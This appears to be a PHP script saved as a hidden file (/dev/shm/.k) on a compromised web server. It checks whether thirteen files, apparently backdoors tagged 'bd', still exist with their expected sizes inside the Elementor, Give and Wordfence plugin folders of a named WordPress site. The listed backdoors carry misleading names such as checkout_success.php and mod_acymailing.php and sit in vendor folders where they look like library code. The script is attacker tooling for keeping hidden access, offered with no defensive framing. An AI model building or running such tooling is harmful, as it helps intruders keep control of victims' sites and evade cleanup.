Current File : //dev/shm/.k
<?php   $r = '/home/therbzja/cedarhighunited.com'; $x = ["/wp-content/plugins/elementor-pro/core/app/modules/site-editor/data/responses/lock.error.response.php"=>"bd@@1094184@@963",
"/wp-content/plugins/elementor-pro/modules/forms/submissions/database/migrations/referer.migration.php"=>"bd@@1102135@@948",
"/wp-content/plugins/give/src/ThirdPartySupport/Elementor/Widgets/V2/ElementorCampaignWidget/userhelpsystem.php"=>"bd@@1293910@@1016",
"/wp-content/plugins/give/src/Framework/PaymentGateways/Webhooks/EventHandlers/Actions/documentation.php"=>"bd@@1293923@@958",
"/wp-content/plugins/elementor-pro/core/app/modules/import-export/runners/import/taxes.php"=>"bd@@1090920@@980",
"/wp-content/plugins/elementor-pro/modules/assets-manager/asset-types/icons/import-export/import.export.php"=>"bd@@1244009@@1011",
"/wp-content/plugins/give/vendor/vendor-prefixed/stellarwp/validation/src/Contracts/send.php"=>"bd@@1293939@@1021",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/7.php"=>"bd@@1209721@@928",
"/wp-content/plugins/give/vendor/stripe/stripe-php/lib/Service/Issuing/checkout_success.php"=>"bd@@1293950@@889",
"/wp-content/plugins/elementor-pro/core/app/modules/site-editor/data/endpoints/templates.types.php"=>"bd@@1109901@@967",
"/wp-content/plugins/elementor/vendor_prefixed/twig/symfony/polyfill-mbstring/Resources/unidata/config_database.php"=>"bd@@1293967@@896",
"/wp-content/plugins/elementor-pro/modules/forms/submissions/database/repositories/form.snapshot.repository.php"=>"bd@@1098411@@937",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/mod_acymailing.php"=>"bd@@1209614@@893"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');